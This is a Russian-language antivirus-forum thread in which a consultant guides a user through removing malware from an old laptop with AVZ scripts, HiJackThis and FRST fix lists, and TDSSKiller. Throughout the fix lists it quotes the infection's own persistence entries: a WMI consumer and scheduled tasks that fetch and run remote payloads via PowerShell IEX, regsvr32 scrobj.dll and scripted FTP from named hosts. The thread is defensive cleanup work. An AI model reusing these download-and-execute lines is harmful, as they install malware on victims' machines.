Перейти к содержимому


Фотография
- - - - -

[РЕШЕНО] Постоянные тормоза ноутбука [Rootkit.Boot.DarkGalaxy.a]

Друзья!

 В данном разделе форума действуют дополнительные правила — тема «Общие правила раздела "Уничтожение вирусов"». Пожалуйста, ознакомьтесь с ними перед размещением любого сообщения в данном разделе.

Для оформления запроса о помощи, внимательно прочитайте и аккуратно выполните указания в теме «Порядок оформления запроса о помощи».


Сообщений в теме: 16

#1 OFF   Larisa46

Larisa46

    Новичок

  • Новички
  • Cообщений: 8

Отправлено 05 Январь 2020 - 19:06

Дано - старинный ноутбук который серфил черт знает что в течение 3х лет.(пользовался пенсионер)
Жесткие тормоза, постоянные вылеты непонятных окон и так далее.

Логи ниже, буду рад помощи.

Прикрепленные файлы


  • 0
  • Спасибо x 1
  • Показать

#2 OFF   mike 1

mike 1

    Мурзик

  • Консультанты
  • Старожилы
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 13 565

Отправлено 05 Январь 2020 - 20:00

Внимание! Рекомендации написаны специально для этого пользователя. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе.
 
Если у вас похожая проблема - создайте тему в разделе Уничтожение вирусов и выполните Правила оформления запроса о помощи.
 
Здравствуйте! 
 
 
Важно! на Windows Vista/7/8 AVZ запускайте через контекстное меню проводника от имени Администратора. Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 
begin
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced','HideFileExt', 0);
 TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe');
 DeleteFile('C:\Windows\inf\aspnet\lsma12.exe','32');
 DeleteSchedulerTask('Mysa');
 DeleteFile('c:\windows\update.exe>','64');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
 DeleteSchedulerTask('oka');
 DeleteFile('c:\windows\debug\item.dat','64');
 DeleteFile('c:\windows\debug\item.dat>','64');
 DeleteFile('c:\windows\help\lsmosee.exe>','64');
 DeleteFile('c:\windows\debug\ok.dat','64');
 DeleteFile('c:\windows\inf\aspnet\lsma12.exe','64');
ExecuteWizard('TSW',2,3,true);
ExecuteSysClean;
RebootWindows(true);
end.
 
Внимание! Будет выполнена перезагрузка компьютера. 
 
Пофиксите следующие строчки в HiJackThis (используйте версию из папки Автологгера).
 
O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"
 
Сделайте новые логи Автологгером. 
 

  • 0
  • Спасибо x 1
  • Показать

#3 OFF   Larisa46

Larisa46

    Новичок

  • Новички
  • Cообщений: 8

Отправлено 05 Январь 2020 - 21:27

 

Внимание! Рекомендации написаны специально для этого пользователя. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе.
 
Если у вас похожая проблема - создайте тему в разделе Уничтожение вирусов и выполните Правила оформления запроса о помощи.
 
Здравствуйте! 
 
 
Важно! на Windows Vista/7/8 AVZ запускайте через контекстное меню проводника от имени Администратора. Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 
begin
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced','HideFileExt', 0);
 TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe');
 DeleteFile('C:\Windows\inf\aspnet\lsma12.exe','32');
 DeleteSchedulerTask('Mysa');
 DeleteFile('c:\windows\update.exe>','64');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
 DeleteSchedulerTask('oka');
 DeleteFile('c:\windows\debug\item.dat','64');
 DeleteFile('c:\windows\debug\item.dat>','64');
 DeleteFile('c:\windows\help\lsmosee.exe>','64');
 DeleteFile('c:\windows\debug\ok.dat','64');
 DeleteFile('c:\windows\inf\aspnet\lsma12.exe','64');
ExecuteWizard('TSW',2,3,true);
ExecuteSysClean;
RebootWindows(true);
end.
 
Внимание! Будет выполнена перезагрузка компьютера. 
 
Пофиксите следующие строчки в HiJackThis (используйте версию из папки Автологгера).
 
O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"
 
Сделайте новые логи Автологгером. 

 


Так же ноутбук не автозагружает антивирус eset.  После установки он просто висит в панели пуск и не запускается даже по клику. После выполнения скрипта так же периодически компьютер уходит в перезагрузку без каких либо ошибок.

Прикрепленные файлы


  • 0

#4 OFF   mike 1

mike 1

    Мурзик

  • Консультанты
  • Старожилы
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 13 565

Отправлено 05 Январь 2020 - 21:32

Пофиксите следующие строчки в HiJackThis
 
O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll (HKLM) (2020/01/05)
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O22 - Task: oka - C:\Windows\system32\cmd.exe /c start c:\windows\inf\aspnet\lsma12.exe
 

 
Важно! на Windows Vista/7/8 AVZ запускайте через контекстное меню проводника от имени Администратора. Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 
begin
 TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe');
 DeleteFile('C:\Windows\inf\aspnet\lsma12.exe','32');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
 DeleteSchedulerTask('oka');
ExecuteSysClean;
ExecuteWizard('TSW',2,2,true);
RebootWindows(true);
end.
 
Внимание! Будет выполнена перезагрузка компьютера. 
 

Скачайте Farbar Recovery Scan Tool  NAAC5Ba.png и сохраните на Рабочем столе.
 
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
  • Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
  • Убедитесь, что под окном Optional Scan отмечены "List BCD", "Driver MD5" и "90 Days Files".
  • Нажмите кнопку Scan.
  • После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
  • Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
3munStB.png
 

 


  • 1

#5 OFF   Larisa46

Larisa46

    Новичок

  • Новички
  • Cообщений: 8

Отправлено 05 Январь 2020 - 21:33

PS. Компьютер уходит в перезагрузку после установки антивируса. После перезагрузки следов антивируса нет. Как будто идёт откат на 10-15 минут... Вот так вот "интересно"


PS. Компьютер уходит в перезагрузку после установки антивируса. После перезагрузки следов антивируса нет. Как будто идёт откат на 10-15 минут... Вот так вот "интересно"


  • 0

#6 OFF   mike 1

mike 1

    Мурзик

  • Консультанты
  • Старожилы
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 13 565

Отправлено 05 Январь 2020 - 21:34

С антивирусом потом разберемся. Выполняйте рекомендации из поста 4. 


  • 0

#7 OFF   Larisa46

Larisa46

    Новичок

  • Новички
  • Cообщений: 8

Отправлено 06 Январь 2020 - 09:26

С антивирусом потом разберемся. Выполняйте рекомендации из поста 4. 

Прикрепляю все необходимое

Прикрепленные файлы


  • 0

#8 OFF   mike 1

mike 1

    Мурзик

  • Консультанты
  • Старожилы
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 13 565

Отправлено 06 Январь 2020 - 12:43

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!
  • Временно выгрузите антивирус, файрволл и прочее защитное ПО.
  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {4E5BA01A-934F-4798-98A6-C0A3EB8AF188} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
Task: {5F519660-63F1-4E10-A9BA-D010C83FAEA0} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {8F4E2712-B7A0-43F5-91CC-8606065C577A} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {91F71B01-BAE4-48BE-B395-859065C0D04A} - System32\Tasks\oka => cmd /c start c:\windows\inf\aspnet\lsma12.exe
Task: {DB4EEAC8-A4E6-4D91-B0CA-581FDCC186F3} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {DEF324ED-E9C9-4958-985D-59F474BCFA0B} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{e7acac32-5a1a-4d10-abc6-11654cb21a41} <==== ATTENTION (Restriction - IP)
2020-01-06 10:54 - 2020-01-06 10:54 - 000003170 _____ C:\Windows\system32\Tasks\oka
2020-01-06 10:53 - 2020-01-06 10:54 - 000003520 _____ C:\Windows\system32\Tasks\Mysa
2020-01-06 10:53 - 2020-01-06 10:54 - 000003506 _____ C:\Windows\system32\Tasks\Mysa3
2020-01-06 10:53 - 2020-01-06 10:54 - 000003426 _____ C:\Windows\system32\Tasks\Mysa2
2020-01-06 10:53 - 2020-01-06 10:54 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1
2020-01-06 10:53 - 2020-01-06 10:54 - 000003186 _____ C:\Windows\system32\Tasks\ok
2019-11-11 17:38 - 2019-12-26 20:39 - 000000254 _____ C:\Windows\system32\n1.dat
2019-11-11 17:38 - 2019-12-26 20:39 - 000000254 _____ C:\Windows\system32\n.dat
2020-01-06 10:41 - 2019-03-04 20:45 - 000000081 _____ C:\Windows\system32\s
2020-01-06 10:41 - 2019-03-04 20:45 - 000000079 _____ C:\Windows\system32\ps
2020-01-06 10:41 - 2019-03-04 20:45 - 000000077 _____ C:\Windows\system32\p
2019-03-04 18:55 - 2019-10-19 19:39 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
2018-07-20 22:01 - 2018-07-20 22:01 - 000004096 ____H () C:\Users\Samsung\AppData\Local\keyfile3.drm
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION
WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
  • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.
  • Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму
 
 
Сделайте новые логи FRST. 

  • 1

#9 OFF   Larisa46

Larisa46

    Новичок

  • Новички
  • Cообщений: 8

Отправлено 06 Январь 2020 - 17:09

 

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!
  • Временно выгрузите антивирус, файрволл и прочее защитное ПО.
  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {4E5BA01A-934F-4798-98A6-C0A3EB8AF188} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
Task: {5F519660-63F1-4E10-A9BA-D010C83FAEA0} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {8F4E2712-B7A0-43F5-91CC-8606065C577A} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {91F71B01-BAE4-48BE-B395-859065C0D04A} - System32\Tasks\oka => cmd /c start c:\windows\inf\aspnet\lsma12.exe
Task: {DB4EEAC8-A4E6-4D91-B0CA-581FDCC186F3} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {DEF324ED-E9C9-4958-985D-59F474BCFA0B} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{e7acac32-5a1a-4d10-abc6-11654cb21a41} <==== ATTENTION (Restriction - IP)
2020-01-06 10:54 - 2020-01-06 10:54 - 000003170 _____ C:\Windows\system32\Tasks\oka
2020-01-06 10:53 - 2020-01-06 10:54 - 000003520 _____ C:\Windows\system32\Tasks\Mysa
2020-01-06 10:53 - 2020-01-06 10:54 - 000003506 _____ C:\Windows\system32\Tasks\Mysa3
2020-01-06 10:53 - 2020-01-06 10:54 - 000003426 _____ C:\Windows\system32\Tasks\Mysa2
2020-01-06 10:53 - 2020-01-06 10:54 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1
2020-01-06 10:53 - 2020-01-06 10:54 - 000003186 _____ C:\Windows\system32\Tasks\ok
2019-11-11 17:38 - 2019-12-26 20:39 - 000000254 _____ C:\Windows\system32\n1.dat
2019-11-11 17:38 - 2019-12-26 20:39 - 000000254 _____ C:\Windows\system32\n.dat
2020-01-06 10:41 - 2019-03-04 20:45 - 000000081 _____ C:\Windows\system32\s
2020-01-06 10:41 - 2019-03-04 20:45 - 000000079 _____ C:\Windows\system32\ps
2020-01-06 10:41 - 2019-03-04 20:45 - 000000077 _____ C:\Windows\system32\p
2019-03-04 18:55 - 2019-10-19 19:39 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
2018-07-20 22:01 - 2018-07-20 22:01 - 000004096 ____H () C:\Users\Samsung\AppData\Local\keyfile3.drm
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION
WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
  • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.
  • Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму
 
 
Сделайте новые логи FRST. 

 

Прикрепленные файлы

  • Прикрепленный файл  Addition.txt   20,76К   скачиваний 2
  • Прикрепленный файл  FRST.txt   65,59К   скачиваний 3
  • Прикрепленный файл  Fixlog.txt   8,11К   скачиваний 1

  • 0

#10 OFF   mike 1

mike 1

    Мурзик

  • Консультанты
  • Старожилы
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 13 565

Отправлено 06 Январь 2020 - 17:56

  • Скачайте архив TDSSKiller.zip и распакуйте его в отдельную папку;
  • Запустите файл TDSSKiller.exe.
  • Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию.
  • В процессе проверки могут быть обнаружены объекты двух типов:
  • вредоносные (точно было установлено, какой вредоносной программой поражен объект);
  • подозрительные (тип вредоносного воздействия точно установить невозможно).
  • По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием.
  • Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить.
  • Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить).
  • Самостоятельно без указания консультанта ничего не удаляйте!!!
  • После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат.
  • Прикрепите лог утилиты к своему следующему сообщению
  • По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\).
    Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt
    Например, C:\TDSSKiller.2.4.7_23.07.2010_15.31.43_log.txt

    • 0

    #11 OFF   Larisa46

    Larisa46

      Новичок

    • Новички
    • Cообщений: 8

    Отправлено 06 Январь 2020 - 18:52

     

    • Скачайте архив TDSSKiller.zip и распакуйте его в отдельную папку;
    • Запустите файл TDSSKiller.exe.
    • Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию.
    • В процессе проверки могут быть обнаружены объекты двух типов:
      •  
    • вредоносные (точно было установлено, какой вредоносной программой поражен объект);
    • подозрительные (тип вредоносного воздействия точно установить невозможно).
    • По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием.
    • Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить.
    • Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить).
    • Самостоятельно без указания консультанта ничего не удаляйте!!!
    • После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат.
    • Прикрепите лог утилиты к своему следующему сообщению
    • По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\).
    Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt
    Например, C:\TDSSKiller.2.4.7_23.07.2010_15.31.43_log.txt

     

    Два лога, после первой проверки и после перезагрузки

    Прикрепленные файлы


    • 0

    #12 OFF   mike 1

    mike 1

      Мурзик

    • Консультанты
    • Старожилы
    • PipPipPipPipPipPipPipPipPipPipPipPipPip
    • Cообщений: 13 565

    Отправлено 06 Январь 2020 - 19:17

    ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!
    • Временно выгрузите антивирус, файрволл и прочее защитное ПО
    • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
    CreateRestorePoint:
    CloseProcesses:
    HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION
    HKU\S-1-5-21-3989281321-2876134707-2914065694-1000\...\MountPoints2: {f81134cf-bd50-11e7-9000-806e6f6e6963} - E:\wpi\MInst.exe
    Task: {033BE705-E2E4-4C7B-89AD-6DD61789B501} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
    Task: {10886A58-E130-49F1-89F3-85AA7CAA6CBD} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
    Task: {72F83CA1-2DA5-4AEE-B874-E36A46146CB2} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
    Task: {B0DA8B18-0966-441C-A91C-5E5431CEA4CA} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
    Task: {B3452BF4-16AA-429B-9648-A8476C911274} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{d898aa95-b9f9-4764-a724-f740df323b8b} <==== ATTENTION (Restriction - IP)
    2020-01-06 18:47 - 2020-01-06 18:47 - 000003170 _____ C:\Windows\system32\Tasks\oka
    2020-01-06 18:44 - 2020-01-06 18:47 - 000003520 _____ C:\Windows\system32\Tasks\Mysa
    2020-01-06 18:44 - 2020-01-06 18:47 - 000003506 _____ C:\Windows\system32\Tasks\Mysa3
    2020-01-06 18:44 - 2020-01-06 18:47 - 000003426 _____ C:\Windows\system32\Tasks\Mysa2
    2020-01-06 18:44 - 2020-01-06 18:47 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1
    2020-01-06 18:44 - 2020-01-06 18:47 - 000003186 _____ C:\Windows\system32\Tasks\ok
    WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION
    WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
    WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION
    
    • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
    • Обратите внимание, что компьютер будет перезагружен.
    • Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму
     
     
    Сделайте новые логи FRST.

    • 0

    #13 OFF   Larisa46

    Larisa46

      Новичок

    • Новички
    • Cообщений: 8

    Отправлено 06 Январь 2020 - 20:27

     

    ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!
    • Временно выгрузите антивирус, файрволл и прочее защитное ПО
    • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
    CreateRestorePoint:
    CloseProcesses:
    HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION
    HKU\S-1-5-21-3989281321-2876134707-2914065694-1000\...\MountPoints2: {f81134cf-bd50-11e7-9000-806e6f6e6963} - E:\wpi\MInst.exe
    Task: {033BE705-E2E4-4C7B-89AD-6DD61789B501} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
